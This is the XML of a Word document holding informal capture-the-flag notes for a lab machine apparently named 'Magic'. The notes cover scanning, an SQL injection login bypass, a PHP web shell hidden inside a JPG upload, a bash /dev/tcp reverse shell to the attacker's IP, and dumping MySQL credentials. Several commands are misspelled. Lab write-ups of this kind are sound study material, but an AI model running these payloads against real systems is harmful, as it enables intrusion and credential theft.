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AB6FC28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355C8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Magic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4D1E620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051427">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV 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2DA1290B" w:rsidR="00843DCE" w:rsidRDefault="00FF1DF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Gobuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="0016334D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip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/wordlists/dirbuster/directory-list-2-3-small.txt -x php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51094810" w14:textId="3631A85E" w:rsidR="00D66A14" w:rsidRDefault="00FF1DFF" w:rsidP="006242E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Because nmap has php open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6145C8" w14:textId="5A11CBE4" w:rsidR="006242EF" w:rsidRDefault="00F17A72" w:rsidP="006242E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obtain login page so capture the request in burp suit</w:t>
      </w:r>
      <w:r w:rsidR="00301D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and save it to req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487EA834" w14:textId="5146E8CE" w:rsidR="00301D4D" w:rsidRDefault="00CD7906" w:rsidP="006242E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login in username </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7906">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' or 1=1-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> password is password and its break the login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E9613" w14:textId="77777777" w:rsidR="00FF1DFF" w:rsidRDefault="00FF1DFF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F38B7D6" w:rsidR="00843DCE" w:rsidRDefault="003C43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notice that the shell is not being upload so try to marge both file shell with jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F4848" w14:textId="7DACE74A" w:rsidR="006969EC" w:rsidRDefault="006969E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php write &lt;?php echo “bhavya”; system($_REQUEST[‘bhavya’]): ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C65AA5" w14:textId="64F9914A" w:rsidR="002726FD" w:rsidRDefault="002726F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image shell.php &gt; megical</w:t>
      </w:r>
      <w:r w:rsidR="00754B9F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so its marge both</w:t>
      </w:r>
      <w:r w:rsidR="00375BDB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and now it can be uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753350D" w14:textId="1658793E" w:rsidR="00E30290" w:rsidRDefault="00E3029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ip/images/uploads/megical.php.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00E12C24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and obtain request in burp just write bhavya=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E58BB" w14:textId="3390400E" w:rsidR="0019754E" w:rsidRDefault="0019754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bhavya=bash -c ‘bash -i &gt;&amp; /dev/tcp/our_ip/9001 0&gt;&amp;1’ with encode </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4FEB1" w14:textId="6D7A7FE6" w:rsidR="00BB2933" w:rsidRDefault="00BB293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error upload same file via burp suit then again run reverse shell and done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620FF8B" w14:textId="678FFED0" w:rsidR="00843DCE" w:rsidRDefault="00BB293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make sure that content type is application/x-www-form-unlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF59D0" w14:textId="77777777" w:rsidR="005E6B4C" w:rsidRDefault="005E6B4C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3967AB5E" w:rsidR="00843DCE" w:rsidRDefault="00223DB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</w:t>
      </w:r>
      <w:r w:rsidR="006D28F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c ‘impact pty;pty.spawm(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228763B1" w14:textId="023D5D6E" w:rsidR="006D28F6" w:rsidRDefault="006D28F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Stty raw -echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F369EAB" w14:textId="5177370C" w:rsidR="0062507B" w:rsidRDefault="0062507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</w:t>
      </w:r>
      <w:r w:rsidR="00360B6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB60161" w14:textId="77777777" w:rsidR="00360B6A" w:rsidRDefault="00360B6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Then visit all the php files and we obtain thesus and its password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD1D63" w14:textId="77777777" w:rsidR="00213395" w:rsidRDefault="0021339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try to login to the database as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C190337" w14:textId="247F452E" w:rsidR="001020EF" w:rsidRDefault="003C617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Mostly we are in var/www/magic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77073569" w14:textId="2D1CEDD7" w:rsidR="003C6173" w:rsidRDefault="003C617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Just write mysql and then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454C7182" w14:textId="6698CB93" w:rsidR="003C6173" w:rsidRDefault="003C617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Mysqldump -u thesus -p magic </w:t>
      </w:r>
      <w:r w:rsidR="003137E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to find the main pa</w:t>
      </w:r>
      <w:r w:rsidR="00D3549D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssword of databse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA7657" w14:textId="4D7F9F37" w:rsidR="001020EF" w:rsidRDefault="00ED77E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</w:t>
      </w:r>
      <w:r w:rsidR="005324F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="005324F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thesus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF2235" w14:textId="6224653A" w:rsidR="009E6C16" w:rsidRDefault="0045627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user.txt</w:t>
      </w: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10E77759" w:rsidR="00843DCE" w:rsidRDefault="00331AA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Watch logic in last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51427"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="001020EF"/>
    <w:rsid w:val="0019754E"/>
    <w:rsid w:val="00213395"/>
    <w:rsid w:val="00223DBD"/>
    <w:rsid w:val="002726FD"/>
    <w:rsid w:val="002A0A7F"/>
    <w:rsid w:val="00301D4D"/>
    <w:rsid w:val="003137E5"/>
    <w:rsid w:val="00331AAA"/>
    <w:rsid w:val="003460B8"/>
    <w:rsid w:val="00355C8D"/>
    <w:rsid w:val="00360B6A"/>
    <w:rsid w:val="00375BDB"/>
    <w:rsid w:val="003C436B"/>
    <w:rsid w:val="003C6173"/>
    <w:rsid w:val="003F54E2"/>
    <w:rsid w:val="00423FBE"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00456271"/>
    <w:rsid w:val="00486302"/>
    <w:rsid w:val="004F7385"/>
    <w:rsid w:val="0052570A"/>
    <w:rsid w:val="005324F4"/>
    <w:rsid w:val="005E6B4C"/>
    <w:rsid w:val="006242EF"/>
    <w:rsid w:val="0062507B"/>
    <w:rsid w:val="006969EC"/>
    <w:rsid w:val="006D28F6"/>
    <w:rsid w:val="00754B9F"/>
    <w:rsid w:val="00841C20"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009E6C16"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A95861"/>
    <w:rsid w:val="00B76758"/>
    <w:rsid w:val="00BB2933"/>
    <w:rsid w:val="00BD34E6"/>
    <w:rsid w:val="00BF2F32"/>
    <w:rsid w:val="00CD7906"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D333FE"/>
    <w:rsid w:val="00D3549D"/>
    <w:rsid w:val="00D66A14"/>
    <w:rsid w:val="00DE6D61"/>
    <w:rsid w:val="00E12C24"/>
    <w:rsid w:val="00E30290"/>
    <w:rsid w:val="00E64317"/>
    <w:rsid w:val="00E64741"/>
    <w:rsid w:val="00ED77E6"/>
    <w:rsid w:val="00F17A72"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F64314"/>
    <w:rsid w:val="00FF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D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48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-11T03:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>